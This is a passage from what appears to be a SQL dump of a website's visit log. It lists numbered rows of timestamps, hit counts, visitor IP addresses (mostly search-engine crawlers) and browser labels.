,'other'),(11655,1456891679,1,1,0,0,'141.8.184.18','other'),(11656,1456891683,1,1,0,0,'141.8.142.41','other'),(11657,1456891891,1,0,1,0,'66.249.78.44',''),(11658,1456892549,1,1,0,0,'5.255.253.17','other'),(11659,1456892550,1,1,0,0,'93.158.152.65','other'),(11660,1456892552,1,1,0,0,'141.8.132.48','other'),(11661,1456892553,1,1,0,0,'178.154.149.9','other'),(11662,1456893091,1,1,0,0,'66.249.92.95','other'),(11663,1456893107,1,1,0,0,'8.29.198.25','other'),(11664,1456893514,8,0,8,0,'66.249.78.144',''),(11665,1456893536,2,0,2,0,'66.249.66.158',''),(11666,1456893562,1,1,0,0,'141.8.142.82','other'),(11667,1456893566,1,1,0,0,'141.8.184.18','other'),(11668,1456893571,1,1,0,0,'178.154.149.11','other'),(11669,1456893576,1,1,0,0,'141.8.183.14','other'),(11670,1456894196,1,1,0,0,'5.255.253.89','other'),(11671,1456894200,1,1,0,0,'130.193.51.22','other'),(11672,1456894205,1,1,0,0,'130.193.51.109','other'),(11673,1456894551,3,1,2,0,'66.249.78.144',''),(11674,1456894585,1,1,0,0,'66.249.66.129','other'),(11675,1456894824,2,0,2,0,'68.180.229.232',''),(11676,1456894997,2,1,1,0,'66.249.78.44',''),(11677,1456895319,2,2,0,0,'66.249.78.30','other'),(11678,1456895729,1,0,1,0,'66.249.78.53',''),(11679,1456895759,1,1,0,0,'130.193.37.21','other'),(11680,1456895763,2,2,0,0,'141.8.132.48','other'),(11681,1456895767,2,2,0,0,'5.255.253.51','other'),(11682,1456895772,2,2,0,0,'141.8.132.97','other'),(11683,1456895776,1,1,0,0,'5.255.253.53','other'),(11684,1456895781,2,2,0,0,'141.8.142.82','other'),(11685,1456895785,1,1,0,0,'141.8.132.79','other'),(11686,1456895789,1,1,0,0,'130.193.51.109','other'),(11687,1456895826,1,0,1,0,'66.249.78.144',''),(11688,1456896029,1,1,0,0,'130.193.51.102','other'),(11689,1456896033,1,1,0,0,'141.8.142.88','other'),(11690,1456896037,1,1,0,0,'141.8.142.41','other'),(11691,1456896042,1,1,0,0,'178.154.189.6','other'),(11692,1456896050,1,1,0,0,'5.255.253.94','other'),(11693,1456896063,1,1,0,0,'141.8.132.74','other'),(11694,1456896069,1,1,0,0,'5.255.253.103','other'),(11695,1456896072,1,1,0,0,'141.8.184.6','other'),(11696,1456896076,1,1,0,0,'5.255.253.17','other'),(11697,1456896081,1,1,0,0,'93.158.152.65','other'),(11698,1456896085,1,1,0,0,'130.193.51.55','other'),(11699,1456896089,1,1,0,0,'5.255.253.89','other'),(11700,1456896094,1,1,0,0,'130.193.51.22','other'),(11701,1456896102,1,1,0,0,'130.193.51.50','other'),(11702,1456896107,1,1,0,0,'93.158.152.81','other'),(11703,1456896551,1,1,0,0,'157.55.39.106','other'),(11704,1456896611,123,123,0,0,'82.193.127.15','other'),(11705,1456897343,2,2,0,0,'91.121.221.15','other'),(11706,1456897591,1,1,0,0,'130.193.51.109','other'),(11707,1456897595,1,1,0,0,'141.8.132.48','other'),(11708,1456897599,1,1,0,0,'178.154.149.9','other'),(11709,1456897604,1,1,0,0,'93.158.152.81','other'),(11710,1456897608,1,1,0,0,'130.193.51.7','other'),(11711,1456897612,1,1,0,0,'130.193.51.91','other'),(11712,1456897617,1,1,0,0,'178.154.149.11','other'),(11713,1456897715,2,0,2,0,'66.249.78.144',''),(11714,1456897774,1,0,1,0,'68.180.229.232',''),(11715,1456897823,159,159,0,0,'82.193.127.15','other'),(11716,1456897957,1,0,1,0,'66.249.79.181',''),(11717,1456897968,1,0,1,0,'66.249.78.44',''),(11718,1456898399,1,1,0,0,'37.9.122.203','other'),(11719,1456898563,1,1,0,0,'37.9.122.202','other'),(11720,1456898567,1,1,0,0,'37.9.122.201','other'),(11721,1456898778,6,1,5,0,'66.249.78.144',''),(11722,1456899005,1,1,0,0,'91.196.178.70','chrome'),(11723,1456899414,2,2,0,0,'80.91.162.99','other'),(11724,1456899512,2,2,0,0,'144.76.8.132','other'),(11725,1456899536,2,2,0,0,'130.193.51.102','other'),(11726,1456899730,2,0,2,0,'66.249.78.144',''),(11727,1456899805,1,1,0,0,'141.8.142.41','other'),(11728,1456899810,1,1,0,0,'178.154.189.6','other'),(11729,1456900163,1,1,0,0,'91.196.178.71','firefox'),(11730,1456900205,1,0,1,0,'66.249.66.158',''),(11731,1456900778,1,1,0,0,'66.102.9.94','firefox'),(11732,1456900914,1,1,0,0,'91.196.179.69','firefox'),(11733,1456901292,5,0,5,0,'66.249.78.144',''),(11734,1456901360,2,0,2,0,'66.249.78.30',''),(11735,1456901481,3,0,3,0,'66.249.66.158',''),(11736,1456901591,1,0,1,0,'68.180.229.232',''),(11737,1456901740,2,2,0,0,'5.255.253.51','other'),(11738,1456901745,1,1,0,0,'5.255.253.94','other'),(11739,1456901749,1,1,0,0,'141.8.142.60','other'),(11740,1456901754,1,1,0,0,'130.193.51.55','other'),(11741,1456901757,1,1,0,0,'141.8.132.66','other'),(11742,1456901767,1,1,0,0,'141.8.142.82','other'),(11743,1456901770,1,1,0,0,'130.193.51.50','other'),(11744,1456901776,1,1,0,0,'130.193.51.91','other'),(11745,1456901779,1,1,0,0,'5.255.253.79','other'),(11746,1456901783,1,1,0,0,'141.8.184.18','other'),(11747,1456901788,1,1,0,0,'5.255.253.17','other'),(11748,1456901792,1,1,0,0,'5.255.253.30','other'),(11749,1456901796,1,1,0,0,'141.8.132.79','other'),(11750,1456901801,1,1,0,0,'130.193.51.85','other'),(11751,1456901805,2,2,0,0,'5.255.253.53','other'),(11752,1456901809,2,2,0,0,'5.255.253.100','other'),(11753,1456901813,1,1,0,0,'130.193.51.81','other'),(11754,1456901818,1,1,0,0,'141.8.142.41','other'),(11755,1456901868,1,1,0,0,'130.193.51.45','other'),(11757,1456902090,1,1,0,0,'207.46.13.176','other'),(11758,1456902745,1,0,1,0,'66.249.66.158',''),(11759,1456902781,1,0,1,0,'66.249.78.144',''),(11760,1456902790,1,1,0,0,'66.249.93.94','firefox'),(11761,1456902838,1,1,0,0,'217.69.133.4','other'),(11762,1456902905,1,1,0,0,'91.196.178.72','chrome'),(11763,1456903271,1,1,0,0,'91.196.178.66','chrome'),(11764,1456903512,1,0,1,0,'66.249.78.37',''),(11765,1456903530,1,1,0,0,'66.249.92.95','other'),(11766,1456903674,3,1,2,0,'66.249.78.144',''),(11767,1456904097,1,1,0,0,'157.55.39.85','other'),(11768,1456904132,1,0,1,0,'68.180.229.232',''),(11769,1456904146,1,1,0,0,'37.54.19.19','chrome'),(11770,1456904314,2,2,0,0,'178.154.149.11','other'),(11771,1456904316,2,2,0,0,'93.158.152.9','other'),(11772,1456904317,1,1,0,0,'130.193.37.21','other'),(11773,1456904321,1,1,0,0,'5.255.253.9','other'),(11774,1456904454,1,1,0,0,'8.29.198.25','other'),(11775,1456904584,1,1,0,0,'130.193.51.45','other'),(11776,1456904588,2,2,0,0,'141.8.184.11','other'),(11777,1456904593,1,1,0,0,'141.8.142.10','other'),(11778,1456904620,1,1,0,0,'130.193.51.85','other'),(11779,1456904705,1,0,1,0,'66.249.78.144',''),(11780,1456904745,1,1,0,0,'178.92.45.217','firefox'),(11781,1456905082,1,0,1,0,'66.249.66.158',''),(11782,1456905551,1,1,0,0,'130.193.37.27','other'),(11783,1456905905,8,0,8,0,'66.249.78.144',''),(11784,1456906120,1,0,1,0,'68.180.229.232',''),(11785,1456906237,1,1,0,0,'178.93.9.182','chrome'),(11786,1456906784,2,2,0,0,'130.193.51.43','other'),(11788,1456906785,1,1,0,0,'5.255.253.10','other'),(11789,1456906786,2,2,0,0,'93.158.152.26','other'),(11790,1456907128,1,0,1,0,'66.249.78.144',''),(11791,1456907192,1,1,0,0,'180.76.15.26','other'),(11792,1456907256,7,1,6,0,'66.249.78.144',''),(11793,1456907310,1,1,0,0,'141.8.132.2','other'),(11794,1456907312,1,1,0,0,'141.8.184.11','other'),(11795,1456907313,1,1,0,0,'141.8.132.97','other'),(11797,1456907493,1,1,0,0,'141.8.132.79','other'),(11798,1456907494,1,1,0,0,'141.8.142.41','other'),(11799,1456907968,2,2,0,0,'178.154.189.204','other'),(11800,1456908040,2,0,2,0,'66.249.78.151',''),(11801,1456908068,1,0,1,0,'66.249.66.162',''),(11802,1456908119,2,0,2,0,'66.249.66.158',''),(11803,1456908188,5,0,5,0,'66.249.78.144',''),(11804,1456908278,1,1,0,0,'178.92.167.59','firefox'),(11805,1456908969,1,1,0,0,'91.196.178.71','chrome'),(11806,1456908977,1,0,1,0,'68.180.229.232',''),(11807,1456908980,1,1,0,0,'92.113.174.126','firefox'),(11808,1456909190,2,2,0,0,'141.8.184.18','other'),(11809,1456909193,2,2,0,0,'141.8.183.14','other'),(11810,1456909194,4,4,0,0,'141.8.132.99','other'),(11811,1456909196,2,2,0,0,'5.255.253.53','other'),(11812,1456909200,2,2,0,0,'130.193.37.21','other'),(11813,1456909206,1,1,0,0,'93.158.152.9','other'),(11814,1456909217,2,2,0,0,'178.154.149.11','other'),(11815,1456909322,1,1,0,0,'5.83.23.12','chrome'),(11816,1456909400,1,1,0,0,'66.249.78.37','other'),(11817,1456909525,3,0,3,0,'66.249.78.144',''),(11818,1456909528,1,0,1,0,'66.249.78.158',''),(11819,1456909557,1,1,0,0,'217.69.143.56','other'),(11820,1456909585,2,0,2,0,'66.249.78.151',''),(11821,1456909867,1,0,1,0,'66.249.66.129',''),(11822,1456910160,2,0,2,0,'66.249.78.44',''),(11823,1456910161,2,2,0,0,'157.55.39.106','other'),(11824,1456910199,1,1,0,0,'217.69.133.31','other'),(11825,1456910229,2,1,1,0,'66.249.78.151',''),(11826,1456910833,1,1,0,0,'207.46.13.176','other'),(11827,1456910971,1,1,0,0,'157.55.39.85','other'),(11828,1456911016,1,0,1,0,'68.180.229.232',''),(11829,1456911067,1,1,0,0,'66.249.78.151','other'),(11830,1456911188,1,1,0,0,'141.8.183.14','other'),(11831,1456911189,1,1,0,0,'93.158.152.9','other'),(11832,1456911190,2,2,0,0,'178.154.149.11','other'),(11833,1456911364,1,1,0,0,'141.8.132.79','other'),(11834,1456911365,1,1,0,0,'141.8.142.41','other'),(11835,1456911366,1,1,0,0,'141.8.142.8','other'),(11836,1456911589,1,1,0,0,'91.196.178.70','firefox'),(11837,1456911672,1,1,0,0,'92.60.182.189','chrome'),(11838,1456911806,1,0,1,0,'66.249.66.158',''),(11839,1456911865,2,0,2,0,'66.249.78.158',''),(11840,1456911928,1,1,0,0,'66.249.66.133','other'),(11841,1456911947,1,1,0,0,'91.196.178.70','chrome'),(11842,1456911990,1,1,0,0,'66.249.78.30','other'),(11843,1456911992,1,1,0,0,'37.9.122.203','other'),(11844,1456912052,2,0,2,0,'66.249.78.151',''),(11845,1456912568,1,1,0,0,'207.46.13.176','other'),(11846,1456912620,21,21,0,0,'83.218.232.238','other'),(11847,1456912774,1,0,1,0,'66.249.78.158',''),(11848,1456912778,6,0,6,0,'66.249.78.144',''),(11849,1456912934,1,0,1,0,'66.249.78.44',''),(11850,1456912954,3,0,3,0,'66.249.78.53',''),(11851,1456913350,1,0,1,0,'68.180.229.232',''),(11852,1456913401,24,24,0,0,'195.242.191.45','firefox'),(11853,1456913653,1,1,0,0,'141.8.184.18','other'),(11854,1456913654,1,1,0,0,'178.154.149.11','other'),(11855,1456913757,1,0,1,0,'66.249.78.144',''),(11856,1456914399,1,1,0,0,'37.9.122.202','other'),(11857,1456914607,2,2,0,0,'178.154.189.201','other'),(11858,1456914611,1,1,0,0,'93.158.152.202','other'),(11859,1456914619,1,1,0,0,'178.154.189.204','other'),(11860,1456914771,1,1,0,0,'66.249.92.99','other'),(11861,1456915104,1,0,1,0,'66.249.66.166',''),(11862,1456915133,1,1,0,0,'91.196.178.136','chrome'),(11863,1456915336,1,1,0,0,'8.29.198.25','other'),(11864,1456915346,1,1,0,0,'141.8.184.11','other'),(11865,1456915347,1,1,0,0,'141.8.184.22','other'),(11866,1456915348,1,1,0,0,'141.8.142.88','other'),(11867,1456915683,1,0,1,0,'66.249.78.158',''),(11868,1456915791,1,1,0,0,'195.10.210.49','chrome'),(11869,1456916010,1,1,0,0,'37.54.197.129','chrome'),(11870,1456916298,2,2,0,0,'94.179.77.57','chrome'),(11871,1456916797,1,1,0,0,'66.249.66.162','other'),(11872,1456917129,1,1,0,0,'78.111.185.50','msie'),(11873,1456917206,3,1,2,0,'66.249.78.151',''),(11874,1456917278,1,0,1,0,'66.249.66.166',''),(11875,1456917312,5,0,5,0,'66.249.66.158',''),(11876,1456917324,2,2,0,0,'178.154.189.204','other'),(11877,1456917400,12,0,12,0,'66.249.78.144',''),(11878,1456917448,1,1,0,0,'157.55.39.85','other'),(11879,1456917970,3,2,1,0,'66.249.78.144',''),(11880,1456918218,1,1,0,0,'91.196.178.36','chrome'),(11881,1456918690,12,1,11,0,'66.249.78.144',''),(11882,1456918979,1,1,0,0,'157.55.39.85','other'),(11883,1456919219,25,1,24,0,'66.249.78.144',''),(11884,1456919247,5,0,5,0,'66.249.66.158',''),(11885,1456919575,1,1,0,0,'217.69.133.250','other'),(11886,1456919681,3,3,0,0,'141.8.183.14','other'),(11887,1456919761,1,1,0,0,'93.158.152.9','other'),(11888,1456919964,1,1,0,0,'180.76.15.7','other'),(11889,1456919994,1,1,0,0,'37.9.122.203','other'),(11890,1456920095,1,1,0,0,'130.193.51.45','other'),(11891,1456920138,3,0,3,0,'66.249.78.144',''),(11892,1456920526,1,1,0,0,'66.249.78.37','other'),(11893,1456920723,1,1,0,0,'180.76.15.13','other'),(11894,1456920727,1,0,1,0,'68.180.229.232',''),(11895,1456921213,2,0,2,0,'66.249.78.144',''),(11896,1456921383,2,2,0,0,'141.8.183.14','other'),(11897,1456921384,2,2,0,0,'5.255.253.53','other'),(11898,1456921404,2,1,1,0,'66.249.78.144',''),(11899,1456921709,1,1,0,0,'91.196.178.70','chrome'),(11900,1456921923,1,1,0,0,'199.58.86.206','other'),(11901,1456921929,1,1,0,0,'66.249.66.158','other'),(11902,1456922018,1,1,0,0,'66.249.78.30','other'),(11903,1456922213,1,1,0,0,'207.46.13.188','other'),(11904,1456922216,1,1,0,0,'91.196.178.163','chrome'),(11905,1456922434,1,0,1,0,'66.249.78.44',''),(11906,1456922556,6,1,5,0,'66.249.78.144',''),(11907,1456922607,1,1,0,0,'141.8.183.14','other'),(11908,1456922612,1,1,0,0,'130.193.51.45','other'),(11909,1456922616,1,1,0,0,'141.8.184.18','other'),(11910,1456922620,1,1,0,0,'5.255.253.9','other'),(11911,1456922658,1,1,0,0,'66.249.78.44','other'),(11912,1456922893,1,1,0,0,'66.249.78.158','other'),(11913,1456923013,3,1,2,0,'66.249.78.151',''),(11914,1456923189,1,1,0,0,'157.55.39.85','other'),(11915,1456923279,28,1,27,0,'66.249.78.144',''),(11916,1456923485,1,1,0,0,'91.196.178.163','chrome'),(11917,1456923725,1,1,0,0,'157.55.39.80','other'),(11918,1456923833,2,0,2,0,'66.249.66.158',''),(11919,1456924184,12,0,12,0,'66.249.78.144',''),(11920,1456924225,1,1,0,0,'178.92.155.250','opera'),(11921,1456924286,1,0,1,0,'66.249.78.30',''),(11922,1456924493,1,1,0,0,'176.241.109.84','firefox'),(11923,1456924502,2,2,0,0,'141.8.183.14','other'),(11924,1456924506,2,2,0,0,'93.158.152.9','other'),(11925,1456924511,2,2,0,0,'141.8.184.18','other'),(11926,1456925125,1,1,0,0,'66.249.78.37','other'),(11927,1456925144,19,0,19,0,'66.249.78.144',''),(11928,1456925348,1,1,0,0,'92.113.174.126','firefox'),(11929,1456925378,1,1,0,0,'91.196.178.71','firefox'),(11930,1456925483,1,1,0,0,'91.196.178.65','firefox'),(11931,1456925729,1,1,0,0,'178.95.205.185','chrome'),(11932,1456925819,1,0,1,0,'68.180.229.232',''),(11933,1456925843,1,1,0,0,'91.196.178.99','chrome'),(11934,1456925921,1,1,0,0,'66.249.92.95','other'),(11935,1456925996,2,1,1,0,'66.249.78.144',''),(11936,1456926203,1,1,0,0,'8.29.198.26','other'),(11937,1456926413,1,1,0,0,'92.113.174.126','firefox'),(11938,1456926899,1,0,1,0,'66.249.78.30',''),(11939,1456926954,3,0,3,0,'66.249.78.151',''),(11940,1456926967,11,0,11,0,'66.249.78.144',''),(11941,1456927100,2,0,2,0,'68.180.229.232',''),(11942,1456927140,2,1,1,0,'66.249.66.158',''),(11943,1456927147,1,1,0,0,'62.149.0.191','other'),(11944,1456927344,1,1,0,0,'162.210.196.100','other'),(11945,1456927365,4,3,1,0,'66.249.78.144',''),(11946,1456927490,2,2,0,0,'178.95.246.186','firefox'),(11947,1456928062,1,1,0,0,'157.55.39.85','other'),(11948,1456928133,1,1,0,0,'95.132.97.204','chrome'),(11949,1456928267,1,1,0,0,'91.196.178.69','firefox'),(11950,1456928311,3,0,3,0,'66.249.78.144',''),(11951,1456928461,1,0,1,0,'66.249.78.37',''),(11952,1456929009,2,1,1,0,'66.249.78.151',''),(11953,1456929276,1,1,0,0,'5.255.253.51','other'),(11954,1456929456,2,2,0,0,'141.8.132.48','other'),(11955,1456929460,1,1,0,0,'141.8.132.2','other'),(11956,1456929465,1,1,0,0,'5.255.253.103','other'),(11957,1456929469,1,1,0,0,'141.8.132.66','other'),(11958,1456929473,1,1,0,0,'130.193.51.22','other'),(11959,1456929483,1,1,0,0,'130.193.51.50','other'),(11960,1456929486,1,1,0,0,'93.158.152.81','other'),(11961,1456929490,1,1,0,0,'141.8.184.18','other'),(11962,1456929505,1,1,0,0,'141.8.183.14','other'),(11963,1456929510,1,1,0,0,'178.154.149.9','other'),(11964,1456929566,1,1,0,0,'95.134.36.24','chrome'),(11965,1456929604,1,1,0,0,'94.179.73.174','chrome'),(11966,1456929794,1,0,1,0,'68.180.229.232',''),(11967,1456930143,1,0,1,0,'66.249.78.30',''),(11968,1456930149,13,0,13,0,'66.249.78.144',''),(11969,1456930239,1,1,0,0,'95.133.32.217','firefox'),(11970,1456930318,1,0,1,0,'66.249.78.158',''),(11971,1456930556,1,1,0,0,'66.249.78.158','other'),(11972,1456930600,1,1,0,0,'157.55.39.80','other'),(11973,1456930981,4,0,4,0,'66.249.66.158',''),(11974,1456931054,32,0,32,0,'66.249.78.144',''),(11975,1456931296,1,1,0,0,'95.135.117.225','chrome'),(11976,1456931452,1,1,0,0,'180.76.15.11','other'),(11977,1456931858,1,1,0,0,'207.46.13.176','other'),(11978,1456932011,1,0,1,0,'66.249.78.30',''),(11979,1456932050,1,0,1,0,'66.249.78.144',''),(11980,1456932106,2,2,0,0,'130.193.51.55','other'),(11981,1456932188,3,0,3,0,'68.180.229.232',''),(11982,1456932215,21,2,19,0,'66.249.78.144',''),(11983,1456932331,2,2,0,0,'141.8.132.74','other'),(11984,1456932332,1,1,0,0,'130.193.50.31','other'),(11985,1456932485,5,5,0,0,'178.154.149.9','other'),(11986,1456932506,1,1,0,0,'157.55.39.80','other'),(11987,1456932678,2,2,0,0,'5.255.253.53','other'),(11988,1456932679,1,1,0,0,'141.8.142.55','other'),(11989,1456932680,2,2,0,0,'141.8.142.82','other'),(11990,1456932718,5,5,0,0,'5.255.253.30','other'),(11991,1456932719,3,3,0,0,'141.8.142.41','other'),(11992,1456932805,2,2,0,0,'130.193.51.22','other'),(11993,1456932859,4,4,0,0,'93.158.152.9','other'),(11994,1456932878,1,1,0,0,'130.193.51.81','other'),(11996,1456933021,2,2,0,0,'141.8.132.2','other'),(11997,1456933037,5,5,0,0,'5.255.253.100','other'),(11998,1456933075,1,1,0,0,'141.8.184.11','other'),(11999,1456933145,3,3,0,0,'5.255.253.79','other'),(12000,1456933147,3,3,0,0,'5.255.253.103','other'),(12001,1456933149,2,2,0,0,'130.193.51.50','other'),(12002,1456933154,2,2,0,0,'130.193.51.109','other'),(12003,1456933159,1,1,0,0,'93.158.152.26','other'),(12004,1456933163,1,1,0,0,'130.193.51.55','other'),(12005,1456933166,2,2,0,0,'130.193.37.27','other'),(12006,1456933186,1,0,1,0,'66.249.78.30',''),(12007,1456933270,1,1,0,0,'91.196.178.70','chrome'),(12008,1456933292,4,4,0,0,'141.8.132.99','other'),(12009,1456933392,2,0,2,0,'68.180.229.232',''),(12010,1456933396,1,1,0,0,'217.69.133.85','other'),(12011,1456933477,1,1,0,0,'141.8.132.66','other'),(12012,1456933478,1,1,0,0,'93.158.152.81','other'),(12013,1456933518,1,1,0,0,'141.8.132.74','other'),(12014,1456933520,1,1,0,0,'130.193.50.22','other'),(12015,1456933521,1,1,0,0,'141.8.142.60','other'),(12016,1456933594,4,4,0,0,'178.154.149.11','other'),(12017,1456933595,2,2,0,0,'130.193.37.21','other'),(12018,1456933596,1,1,0,0,'130.193.51.45','other'),(12019,1456933606,7,7,0,0,'141.8.184.18','other'),(12020,1456933622,1,0,1,0,'66.249.78.151',''),(12021,1456933674,3,3,0,0,'5.255.253.53','other'),(12022,1456933675,1,1,0,0,'141.8.184.22','other'),(12023,1456933702,1,1,0,0,'37.54.18.53','chrome'),(12024,1456934152,5,5,0,0,'5.255.253.100','other'),(12025,1456934251,12,0,12,0,'66.249.78.144',''),(12026,1456934296,3,3,0,0,'141.8.132.99','other'),(12027,1456934297,5,5,0,0,'141.8.183.14','other'),(12028,1456934327,1,1,0,0,'66.249.78.158','other'),(12029,1456934374,3,3,0,0,'93.158.152.9','other'),(12030,1456934543,17,17,0,0,'141.8.184.18','other'),(12031,1456934569,5,5,0,0,'178.154.149.11','other'),(12032,1456934668,1,0,1,0,'66.249.78.30',''),(12033,1456934726,2,2,0,0,'5.255.253.53','other'),(12034,1456934846,3,1,2,0,'66.249.78.144',''),(12035,1456935074,1,1,0,0,'91.196.178.136','chrome'),(12036,1456935310,1,1,0,0,'91.196.178.70','chrome'),(12037,1456935402,19,19,0,0,'130.193.37.21','other'),(12038,1456935413,25,25,0,0,'141.8.132.99','other'),(12039,1456935415,24,24,0,0,'141.8.183.14','other'),(12040,1456935469,1,1,0,0,'66.249.75.94','other'),(12041,1456935474,22,22,0,0,'141.8.184.18','other'),(12042,1456935509,29,29,0,0,'178.154.149.11','other'),(12043,1456935518,1,0,1,0,'66.249.69.124',''),(12044,1456935520,2,2,0,0,'141.8.132.2','other'),(12045,1456935521,1,1,0,0,'130.193.51.81','other'),(12046,1456935690,2,2,0,0,'130.193.51.43','other'),(12047,1456935693,31,31,0,0,'93.158.152.9','other'),(12048,1456935694,25,25,0,0,'5.255.253.100','other'),(12049,1456935699,31,31,0,0,'5.255.253.53','other'),(12050,1456935756,2,0,2,0,'66.249.69.3',''),(12051,1456935824,14,14,0,0,'130.193.51.45','other'),(12052,1456935870,1,0,1,0,'66.249.69.11',''),(12053,1456936316,8,8,0,0,'130.193.37.21','other'),(12054,1456936320,7,7,0,0,'141.8.183.14','other'),(12055,1456936392,2,2,0,0,'66.249.75.101','other'),(12056,1456936397,4,4,0,0,'141.8.132.99','other'),(12057,1456936452,1,1,0,0,'66.249.75.108','other'),(12058,1456936460,6,6,0,0,'141.8.184.18','other'),(12060,1456936467,8,8,0,0,'178.154.149.11','other'),(12061,1456936656,1,1,0,0,'94.179.8.85','firefox'),(12062,1456936781,2,0,2,0,'66.249.69.11',''),(12063,1456936879,1,1,0,0,'113.167.247.22','other'),(12064,1456936940,12,12,0,0,'5.255.253.53','other'),(12065,1456936995,1,1,0,0,'207.46.13.188','other'),(12066,1456937012,1,1,0,0,'8.29.198.26','other'),(12067,1456937122,1,1,0,0,'66.249.91.8','other'),(12068,1456937248,1,0,1,0,'66.249.69.3',''),(12069,1456937294,1,1,0,0,'5.255.253.103','other'),(12070,1456937295,1,1,0,0,'93.158.152.65','other'),(12071,1456937351,2,2,0,0,'66.249.75.101','other'),(12072,1456937377,1,1,0,0,'66.249.75.94','other'),(12073,1456937392,1,1,0,0,'91.196.178.70','chrome'),(12074,1456937515,1,1,0,0,'141.8.184.6','other'),(12075,1456937519,11,11,0,0,'141.8.183.14','other'),(12076,1456937520,11,11,0,0,'178.154.149.11','other'),(12077,1456937527,23,23,0,0,'141.8.184.18','other'),(12078,1456937543,14,14,0,0,'93.158.152.9','other'),(12079,1456937544,6,6,0,0,'141.8.132.99','other'),(12080,1456937550,2,2,0,0,'5.255.253.100','other'),(12081,1456937841,38,0,38,0,'66.249.69.124',''),(12082,1456937943,1,0,1,0,'66.249.69.11',''),(12083,1456938031,1,1,0,0,'66.249.69.3','other'),(12084,1456938100,4,4,0,0,'130.193.37.21','other'),(12085,1456938112,1,1,0,0,'130.193.51.45','other'),(12086,1456938119,4,4,0,0,'5.255.253.53','other'),(12087,1456938192,1,1,0,0,'130.193.51.43','other'),(12088,1456938201,1,1,0,0,'94.179.8.85','firefox'),(12089,1456938315,1,0,1,0,'68.180.229.232',''),(12090,1456938494,1,1,0,0,'217.69.133.225','other'),(12091,1456938623,1,1,0,0,'217.69.136.209','other'),(12092,1456938749,11,0,11,0,'66.249.69.124',''),(12093,1456939001,17,1,16,0,'66.249.69.124',''),(12094,1456939008,3,0,3,0,'66.249.69.3',''),(12095,1456939178,1,1,0,0,'207.46.13.188','other'),(12096,1456939706,2,0,2,0,'66.249.69.11',''),(12097,1456939749,1,1,0,0,'130.193.50.22','other'),(12098,1456939750,1,1,0,0,'130.193.51.22','other'),(12099,1456939751,1,1,0,0,'141.8.142.82','other'),(12100,1456940259,1,1,0,0,'141.8.184.11','other'),(12101,1456940432,2,0,2,0,'66.249.69.3',''),(12102,1456940443,30,0,30,0,'66.249.69.124',''),(12103,1456940517,1,0,1,0,'68.180.229.232',''),(12104,1456940569,1,1,0,0,'207.46.13.188','other'),(12105,1456941006,1,1,0,0,'37.19.149.254','chrome'),(12106,1456941064,1,0,1,0,'66.249.69.11',''),(12107,1456941156,1,1,0,0,'92.113.174.126','firefox'),(12108,1456941279,1,1,0,0,'130.193.50.22','other'),(12109,1456941280,1,1,0,0,'130.193.51.43','other'),(12110,1456941424,1,1,0,0,'66.249.75.94','other'),(12111,1456941796,2,0,2,0,'66.249.69.3',''),(12112,1456941809,2,0,2,0,'66.249.69.124',''),(12113,1456942225,2,0,2,0,'66.249.69.11',''),(12114,1456942327,1,1,0,0,'141.8.142.41','other'),(12115,1456942328,1,1,0,0,'130.193.51.22','other'),(12117,1456942534,1,0,1,0,'66.249.75.108',''),(12118,1456942924,1,1,0,0,'178.154.189.12','other'),(12119,1456942925,1,1,0,0,'130.193.51.50','other'),(12120,1456943136,1,0,1,0,'68.180.229.232',''),(12121,1456943426,2,0,2,0,'66.249.69.3',''),(12122,1456943746,1,0,1,0,'66.249.69.11',''),(12123,1456944605,1,1,0,0,'5.255.253.89','other'),(12125,1456944606,1,1,0,0,'93.158.152.26','other'),(12126,1456944712,1,0,1,0,'68.180.229.232',''),(12127,1456944879,1,1,0,0,'94.179.24.119','firefox'),(12128,1456945101,2,0,2,0,'66.249.69.11',''),(12129,1456945120,65,0,65,0,'66.249.69.124',''),(12130,1456945543,1,1,0,0,'207.46.13.176','other'),(12131,1456945604,1,1,0,0,'5.255.253.55','other'),(12132,1456945605,1,1,0,0,'141.8.132.109','other'),(12133,1456945749,1,1,0,0,'46.133.122.211','chrome'),(12134,1456946143,1,1,0,0,'130.193.51.109','other'),(12136,1456946189,1,1,0,0,'141.8.132.79','other'),(12137,1456946190,1,1,0,0,'93.158.152.9','other'),(12138,1456946191,1,1,0,0,'130.193.51.45','other'),(12139,1456946423,1,1,0,0,'141.8.132.2','other'),(12140,1456946424,1,1,0,0,'130.193.37.21','other'),(12141,1456946425,1,1,0,0,'141.8.132.76','other'),(12142,1456946426,1,1,0,0,'141.8.142.8','other'),(12143,1456946501,26,0,26,0,'66.249.69.124',''),(12144,1456946574,4,4,0,0,'63.141.226.178','other'),(12145,1456946625,1,1,0,0,'5.255.253.110','other'),(12146,1456946626,1,1,0,0,'141.8.142.41','other'),(12147,1456946814,1,1,0,0,'178.154.149.11','other'),(12148,1456946946,2,0,2,0,'66.249.69.11',''),(12149,1456947272,1,1,0,0,'217.69.133.9','other'),(12150,1456947416,1,1,0,0,'66.249.91.4','other'),(12151,1456947571,29,0,29,0,'66.249.69.124',''),(12152,1456947581,1,0,1,0,'66.249.69.3',''),(12153,1456947991,1,1,0,0,'8.29.198.26','other'),(12154,1456948025,1,1,0,0,'141.8.184.18','other'),(12155,1456948078,1,1,0,0,'78.111.185.93','chrome'),(12156,1456948384,1,0,1,0,'68.180.229.232',''),(12157,1456948694,37,0,37,0,'66.249.69.124',''),(12158,1456948940,1,1,0,0,'109.251.62.237','chrome'),(12159,1456948945,1,0,1,0,'66.249.69.11',''),(12160,1456949371,1,1,0,0,'150.70.188.178','msie'),(12161,1456949432,1,1,0,0,'141.8.184.6','other'),(12162,1456949569,1,1,0,0,'178.93.150.152','chrome'),(12163,1456949772,3,1,2,0,'66.249.69.124',''),(12164,1456949793,1,1,0,0,'91.196.178.164','firefox'),(12165,1456950187,3,3,0,0,'93.158.152.9','other'),(12166,1456950503,1,1,0,0,'207.46.13.188','other'),(12167,1456950614,1,1,0,0,'92.113.174.126','firefox'),(12168,1456950616,1,0,1,0,'66.249.69.3',''),(12169,1456950682,3,3,0,0,'141.8.132.99','other'),(12170,1456950683,2,2,0,0,'178.154.149.11','other'),(12171,1456950687,2,2,0,0,'130.193.51.45','other'),(12172,1456950688,3,3,0,0,'5.255.253.100','other'),(12173,1456950689,1,1,0,0,'130.193.37.21','other'),(12174,1456950746,15,0,15,0,'66.249.69.124',''),(12175,1456951499,1,1,0,0,'157.55.39.85','other'),(12176,1456951781,1,0,1,0,'66.249.75.108',''),(12177,1456951854,1,1,0,0,'66.249.75.108','other'),(12178,1456952112,2,1,1,0,'66.249.69.11',''),(12179,1456952303,23,0,23,0,'66.249.69.124',''),(12180,1456952338,2,0,2,0,'66.249.69.3','